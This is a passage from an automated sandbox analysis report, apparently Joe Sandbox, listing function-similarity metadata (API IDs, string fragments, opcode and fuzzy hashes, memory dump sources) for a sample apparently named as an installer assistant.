                                • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                • Instruction Fuzzy Hash: 6B21D8B0801B40CFC760CF6AC14428ABBF4FF29708B10C95EC0AA97B11E7B8A608CF55
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: <J$DJ$HJ$TJ$]
                                • API String ID: 0-686860805
                                • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                • Instruction ID: 3039d0835cb5ff36523cc34e88f71686d3989bc10d402ec1e3f32f9a9030b3f3
                                • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                • Instruction Fuzzy Hash: 0E417171C4628DAFDF34DBA1D4908EEB779AF1130CB3081ADD12167B60EB35A649CB11
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: __aulldiv
                                • String ID:
                                • API String ID: 3732870572-0
                                • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                • Instruction ID: 2e0c0bf0025feba9545f45009ed057f80f7c71332930bc8c28923fefdea99f96
                                • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                • Instruction Fuzzy Hash: 9511A276604344BFEB218AA4CC44EEF7BBDEFC5748F20842EB14556A50CB71AC45D760
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CE7E077
                                  • Part of subcall function 6CE7DFF5: __EH_prolog.LIBCMT ref: 6CE7DFFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: :$\
                                • API String ID: 3519838083-1166558509
                                • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                • Instruction ID: 2143dae4ad77e1d8e321da2084f8f0fda7041ef389d92d20290559934e76f888
                                • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                • Instruction Fuzzy Hash: B4E1AF30900A499ECB35DFA4C890BEDB7B1AF1631CF30411DD45567BA0EB75AA4ACBB1
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: @$hfJ
                                • API String ID: 3519838083-1391159562
                                • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                • Instruction ID: a28c5544d686c12e072414bef5320e1fe16397e38d80669886ae710739e9142b
                                • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                • Instruction Fuzzy Hash: 46913770910348EFCB20DFD9C8849DEFBB4BF18308F60451EE14AA7A90D774AA49CB20
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CE98C5D
                                  • Part of subcall function 6CE9761A: __EH_prolog.LIBCMT ref: 6CE9761F
                                  • Part of subcall function 6CE97A2E: __EH_prolog.LIBCMT ref: 6CE97A33
                                  • Part of subcall function 6CE98EA5: __EH_prolog.LIBCMT ref: 6CE98EAA
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: WZJ
                                • API String ID: 3519838083-1089469559
                                • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                • Instruction ID: c8bcb82f4e163c3781113f191105da75beac7ae00707144dae89590e60c22775
                                • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                • Instruction Fuzzy Hash: 93813A31D01259DFCB25DFA4D990ADDB7B4AF19318F20409EE416B7BA0DB30AE49CB61
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog__aullrem
                                • String ID: d%K
                                • API String ID: 3415659256-3110269457
                                • Opcode ID: ac62a312e9615e63fe83044f2985e6da76b9d9f2e0a1fb3315288c38c591097e
                                • Instruction ID: d693aec8e415eba8133f411274983acf2d6f45a1c8d095404084feb770e42991
                                • Opcode Fuzzy Hash: ac62a312e9615e63fe83044f2985e6da76b9d9f2e0a1fb3315288c38c591097e
                                • Instruction Fuzzy Hash: 56617672B412498BDB11CFA4C644BAEB7B1AF4530DF348058D868ABB81D775DA05CBA2
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: CK$CK
                                • API String ID: 3519838083-2096518401
                                • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                                • Instruction ID: 99ea8f93b268b0fba1fc00e0d273a5cad1121395dc7c996b72a7fc35b718001d
                                • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                                • Instruction Fuzzy Hash: FF516075B003059FDB00CFA4C984ABFB3B9FF88358F248529D921EBB41D775A9058B61
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: <dJ$Q
                                • API String ID: 3519838083-2252229148
                                • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                • Instruction ID: ec510ad9755809c892888d458b4e0581f5f98f97951158a80346a99e70b91f0c
                                • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                • Instruction Fuzzy Hash: A0517D71904289EFCF10DFD5D8808EDB7B1BF49318F20852EE516ABB50D7359A4ACB21
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: PdJ$Q
                                • API String ID: 3519838083-3674001488
                                • Opcode ID: 87eb3cb62c03194caae5458ff4b741e3c8b0552ef8959399e26f931c5ab5bbcd
                                • Instruction ID: c3466ad67a4f87fd8dc14cd8929ec27416a3368acb10dfa392b02998cb764591
                                • Opcode Fuzzy Hash: 87eb3cb62c03194caae5458ff4b741e3c8b0552ef8959399e26f931c5ab5bbcd
                                • Instruction Fuzzy Hash: 49418D32D01245DFDB11DFE8C8909EDB7B0FF49318B20856EE926ABB50D3309946CBA4
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: 0|J$`)L
                                • API String ID: 3519838083-117937767
                                APIs
                                Strings
                                Similarity
                                • API ID: __aulldiv
                                • String ID: 3333
                                • API String ID: 3732870572-2924271548
                                APIs
                                Strings
                                Similarity
                                • API ID: H_prolog
                                • String ID: @$LuJ
                                • API String ID: 3519838083-205571748
                                APIs
                                Strings
                                Similarity
                                • API ID: H_prolog
                                • String ID: @$xMJ
                                • API String ID: 3519838083-951924499
                                APIs
                                Strings
                                Similarity
                                • API ID: H_prolog
                                • String ID: p/K$J
                                • API String ID: 3519838083-2069324279
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CEBAFCC
                                  • Part of subcall function 6CEBA4D1: __EH_prolog.LIBCMT ref: 6CEBA4D6
                                  • Part of subcall function 6CEB914B: __EH_prolog.LIBCMT ref: 6CEB9150
                                Strings
                                Similarity
                                • API ID: H_prolog
                                • String ID: J$0J
                                • API String ID: 3519838083-2882003284
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CEB43F9
                                  • Part of subcall function 6CEB4320: __EH_prolog.LIBCMT ref: 6CEB4325
                                Strings
                                Similarity
                                • API ID: H_prolog
                                • String ID: `)L$|{J
                                • API String ID: 3519838083-2198066115
                                APIs
                                Strings
                                Similarity
                                • API ID: H_prologctype
                                • String ID: <oJ
                                • API String ID: 3037903784-2791053824
                                Strings
                                Similarity
                                • API ID:
                                • String ID: D)K$H)K$P)K$T)K
                                • API String ID: 0-2262112463
                                Strings
                                Similarity
                                • API ID:
                                • String ID: (?K$8?K$H?K$CK
                                • API String ID: 0-3450752836